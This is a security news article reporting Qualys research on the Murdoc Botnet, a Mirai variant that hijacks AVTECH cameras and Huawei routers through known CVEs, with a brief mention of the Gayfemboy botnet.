Pierluigi Paganini
January 21, 2025
Murdoc Botnet is a new Mirai botnet variant that targets vulnerabilities in AVTECH IP cameras and Huawei HG532 routers, the Qualys Threat Research Unit reported.
The botnet has been active since at least July 2024, the experts discovered that over 1300 IPs were found active on this campaign. Most of the infected systems are in Malaysia, Thailand, Mexico, and Indonesia.
Researchers found over 100 servers distributing Mirai malware and communicating with compromised IPs, indicating the campaign is ongoing.
“Mirai malware, here dubbed as Murdoc Botnet, is a prominent malware family for *nix systems. It mainly targets vulnerable AVTECH and Huawei devices. This botnet also uses some existing exploits (CVE-2024-7029, CVE-2017-17215) to download the next-stage payloads.” reads the advisory.
The payload targets AVTECH cameras, using command-line injection to fetch, execute, and remove shell scripts. The Qualys Threat Research Unit discovered over 500 samples containing ELF files and ShellScript files. The ShellScript is loaded onto IoT devices such as IP cameras, and network devices, revealing that the Murdoc Botnet specifically targets IoT devices via this mechanism, leveraging C2 servers for new Mirai variant propagation.
The bot shell script uses GTFOBins to fetch, grant execution permissions, execute, and then remove the payload.
Recently, QiAnXin XLab experts observed the Mirai-based Gayfemboy botnet delivering its bot by exploiting more than 20 vulnerabilities, they also attempted to exploit Telnet weak credentials. The researchers discovered that attackers targeted the zero-day vulnerability CVE-2024-12856 in Four-Faith industrial routers along with several unknown vulnerabilities affecting Neterbit and Vimar devices.
Gayfemboy exploits various vulnerabilities, including CVE-2013-3307, CVE-2021-35394, CVE-2024-8957, and others in DVRs, routers, and security appliances.
Follow me on Twitter: @securityaffairs and Facebook and Mastodon
(SecurityAffairs – hacking, botnet)
